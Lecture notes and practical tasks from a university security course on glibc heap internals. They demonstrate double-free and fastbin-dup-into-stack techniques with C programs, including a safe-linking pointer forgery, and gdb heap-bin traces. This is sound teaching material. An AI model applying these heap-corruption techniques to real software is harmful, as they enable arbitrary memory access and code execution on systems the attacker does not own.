Buffer Issues - Heap | João Paulo Barraca

Lecture Notes

This lecture will present an overview over issues involving Buffers overflow, underflow, or otherwise incorrectly used.

Download here

Related files:

Practical tasks

This guide will complement the lecture slides and present code and descriptions to enable exploitation of buffer vulnerabilities.

Because the aspects we address are actual issues with libc, which are fixed as soon as possible, we recommend you run the exercises with libc up to 2.36.

For a detailed review of the different techniques and their applicability, check:

Heap

Memory allocated through malloc, new and friends, is not placed on the stack. It is placed in the Heap, a zone usually located before the shared libraries, and growing upwards. As we talked in the theoretical part, the heap chunks allocated do not directly map to individual pages, and there are several structures keeping track of used and freed chunks. As chunks are freed they are placed on bins, which can be used when a new chunk of the same size is allocated. This makes sense to improve speed as a program frequently works with chunks (e.g., from structures of objects) that are mostly the same size, or similar sizes. However, this process is not bullet proof and there may be some attacks possible, that are valid for specific glibc versions.

Recent versions of glibc use the following structures:

fastbin: A set of single linked lists of free chunks with specific sizes (up to 0xb0). They are consumed from the top, as the logic is minimal. Chunks are first placed here and later consolidated. This is meant for fast access of recent chunks.
unsorted bin: This is a double linked list with chunks of any size and it’s the first place were chunks are placed when consolidating and before sorting into other bins.
small bin: There are 62 of these bins, each being composed by a double linked list of freed chunks of a specific size. Chunks were are coalesced (merged) with adjacent free chunks to match a given size and placed here.
large bin: A set of double linked lists of chunks with larger sizes. Each bin stores a range of sizes. The logic is similar to the small bin but more complex. Getting a chunk implies finding the “best matching one”, extracting the needed size and keep the remainder as a new chunks.
tcache: This was introduced in libc 2.26 and constitutes a set of 64 double linked lists (bins), each storing object of a specific size. It also includes a counter with the size of the bin and the size is reduced (typically 7). It was meant as a fast, per thread, list to speedup memory access in multi-threaded programs. This avoids the need to locking the global arena where the other bins are placed.

These are all in a Arena that stores additional metadata. Chunks also had a set of hooks that were called by malloc at specific situations (.e.g __free_hook), but this was removed in version 2.34.

A detailed overview of this is present here. Take in consideration that some details change with the libc version in use.

The most basic attack to be conducted is the double free. It basically relies on freeing a block twice, and is the base of most other attacks. The attack allows editing other chunks, heap metadata structures or even provide arbitrary read or write. However, this is not that trivial in recent libc versions as mitigations were developed.

In particular, when considering the fastbin, as it is a linked list, each chunk has the address of the next chunk in the list. If we overwrite the address stored there, when allocating a new chunk we may “force” malloc to give us access to an area in another location (e.g, in the stack).

Consider the following program that plays with the heap, and is valid for libc v2.34 (current kali). It works because calloc will prefer the slow path (fastbin) instead of the tcache if tcache is full.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define chunks 8

int main()
{
    setbuf(stdout, NULL);
    // Fill the tcache so that future allocations go to the fastbin
    // Calloc will favour the fastbin instead of the tcache
    void *ptrs[chunks];
    for (int i=0; i<chunks; i++) {
        ptrs[i] = malloc(8);
        printf("malloc num: %d: %p\n", i, ptrs[i]);
    }
    for (int i=0; i<chunks; i++) {
        free(ptrs[i]);
    }
    
    int *a = calloc(1, 8); // Allocate 3 small chunks
    int *b = calloc(1, 8); // Calloc will use the fastbin first
    int *c = calloc(1, 8);

    free(a); // Free places chunks on the fastbins
    free(b);
    free(a); // Free a again! Should not happen!

    printf("fastbin should be [ %p, %p, %p ].\n", a, b, a);

    a = calloc(1, 8); // allocate three more
    b = calloc(1, 8);

    printf("1st calloc(1, 8): %p\n", a);
    printf("2nd calloc(1, 8): %p\n", b);
    c = calloc(1, 8);
    printf("3rd calloc(1, 8): %p\n", c);
    // Should be dup
}

__ Tasks:__

Compile it and test the result.
Verify that a equals c
change the value of chunks and see the impact to the addresses obtained by calloc

In order to check the operation in detail, break at line 23 (break fastbin_dup.c:23) and then issue heap bins to show how the bins are structure. The result should be similar to the following. Observe that the last free block is at the fastbin.

Tcachebins[idx=0, size=0x20, count=7] ←  Chunk(addr=0x555555559360, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x555555559340, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x555555559320, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x555555559300, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x5555555592e0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x5555555592c0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x5555555592a0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────── Fastbins for arena at 0x7ffff7df2c60 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Fastbins[idx=0, size=0x20]  ←  Chunk(addr=0x555555559380, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Fastbins[idx=1, size=0x30] 0x00
Fastbins[idx=2, size=0x40] 0x00
Fastbins[idx=3, size=0x50] 0x00
Fastbins[idx=4, size=0x60] 0x00
Fastbins[idx=5, size=0x70] 0x00
Fastbins[idx=6, size=0x80] 0x00
────────────────────────────────────────────────────────────────────────────────────────────────────────────────── Unsorted Bin for arena at 0x7ffff7df2c60 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[+] Found 0 chunks in unsorted bin.
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── Small Bins for arena at 0x7ffff7df2c60 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[+] Found 0 chunks in 0 small non-empty bins.
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── Large Bins for arena at 0x7ffff7df2c60 ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[+] Found 0 chunks in 0 large non-empty bins.

If you move forward and free the recently allocated blocks, you will get:

...
Fastbins[idx=0, size=0x20]  ←  Chunk(addr=0x555555559380, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x5555555593a0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x555555559380, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  →  [loop detected]
...

If you move after the final calloc calls, you will see that the fastbin is consumed (and there is an error).

Fastbins[idx=0, size=0x20] [!] Command 'heap bins fast' failed to execute properly, reason: Cannot access memory at address 0x555555559

Exploiting Use After Free

If you notice from the last example, the last calloc will return a duplicated chunk, but we already have a pointer to that block! This means that we can control what is returned by overwriting the fastbin head pointer.

One possible attack is named Fastbin Dup into stack. It works by corrupting the fastbin so that it provides a chunk from a arbitrary address. In this case we are using the stack, but the method provides arbitrary read over the program memory space.

The attack as demonstrated on libc 2.35 and is still valid. A live demonstration can be accessed here: https://wargames.ret2.systems/level/how2heap_fastbin_dup_into_stack_2.23 The right side is a gdb instance, where you can control the program. We recommend you break at main, run and examine how the heap evolves (heap bins) with the execution of the next instruction.

As an example, when stopped at line 34, we can check the result of the alternate free, which creates a duplicated entry (double free).

wdb> heap bins
Heap Info for Arena 0x7f4e630dcb20
                   top: 0x62d060 (size: 0x20fa0)
        last_remainder: 0x0
(0x20)      fastbin[0]: 0x62d000 -> 0x62d020 -> 0x62d000 (duplicate entry)
(0x30)      fastbin[1]: 0x0
(0x40)      fastbin[2]: 0x0
(0x50)      fastbin[3]: 0x0
(0x60)      fastbin[4]: 0x0
(0x70)      fastbin[5]: 0x0
(0x80)      fastbin[6]: 0x0
      unsorted bins[0]: 0x0

Consider the following variation of the previous program:

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
        void *ptrs[7];
        unsigned long stack_var[2] __attribute__ ((aligned (0x10)));

        for (int i=0; i<7; i++) {
                ptrs[i] = malloc(8);
        }
        for (int i=0; i<7; i++) {
                free(ptrs[i]);
        }

        int *a = calloc(1,8);
        int *b = calloc(1,8);
        int *c = calloc(1,8);

        fprintf(stderr, "1st calloc(1,8): %p\n", a);
        fprintf(stderr, "2nd calloc(1,8): %p\n", b);
        fprintf(stderr, "3rd calloc(1,8): %p\n", c);

        free(a);
        free(b);
        free(a);

        unsigned long *d = calloc(1,8);
        unsigned long *e = calloc(1,8);
        fprintf(stderr, "4th calloc(1,8): %p\n", d);
        fprintf(stderr, "5th calloc(1,8): %p\n", e);

        fprintf(stderr,"We can access %p while it remains at the head of the free list.\n", a);
        fprintf(stderr,"Write a fake free size (0x20) to the stack\n");
        stack_var[1] = 0x20;
        fprintf(stderr, "Overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);

        unsigned long ptr = (unsigned long) stack_var;
        unsigned long addr = (unsigned long) d;

        *d = (addr >> 12) ^ ptr; // Safe Linking mechanism

        fprintf(stderr, "6th calloc(1,8): %p, putting the stack address on the free list\n", calloc(1,8));

        void *p = calloc(1,8);
        fprintf(stderr, "7th calloc(1,8): p=%p (stack_var=%p)\n", p, stack_var);
}

Tasks:

Compile the program and analyse how the heap evolves
Observe the status before the last calloc

If we execute the program, the result will be similar to the previous case. We get a pointer to a chunk, and this same chunk is still on the fastbin list, ready to be provided to other calls of calloc.

After the free instructions, this is the structure of the fastbin

Fastbins[idx=0, size=0x20]  ←  Chunk(addr=0x555555559380, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x5555555593a0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x555555559380, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  →  [loop detected]

If we dump the first chunk, we can see the actual linking, where each chunk points to the next one. The 0x21 value is the size plus a status flag.

gef> g/16gx 0x555555559380
0x555555559380: 0x000055500000c6c9      0x0000000000000000
0x555555559390: 0x0000000000000000      0x0000000000000021
0x5555555593a0: 0x000055500000c629      0x0000000000000000
0x5555555593b0: 0x0000000000000000      0x0000000000000021
0x5555555593c0: 0x0000000000000000      0x0000000000000000
0x5555555593d0: 0x0000000000000000      0x0000000000020c31

After the chunk is corrupted, we can check the fastbin again:

Fastbins[idx=0, size=0x20]  ←  Chunk(addr=0x555555559380, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  Chunk(addr=0x7fffffffe3c0, size=0x20, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)  ←  [Corrupted chunk at 0x7fffffffe3c0]

The next chunk to be provided will be 0x555555559380, but then, we will get 0x7fffffffe3c0. The same example can be used to provide access to any other memory area.

A Challenge

This attack, and others that corrupt the heap linked lists, can be combined to actually execute code on remote systems. The example provided here, with solution, shows this.

Also, a set of challenges (easy and medium) were selected from PicoGym.

Buffer Issues - Heap

Lecture Notes

Practical tasks

Heap

Exploiting Use After Free

A Challenge

Feedback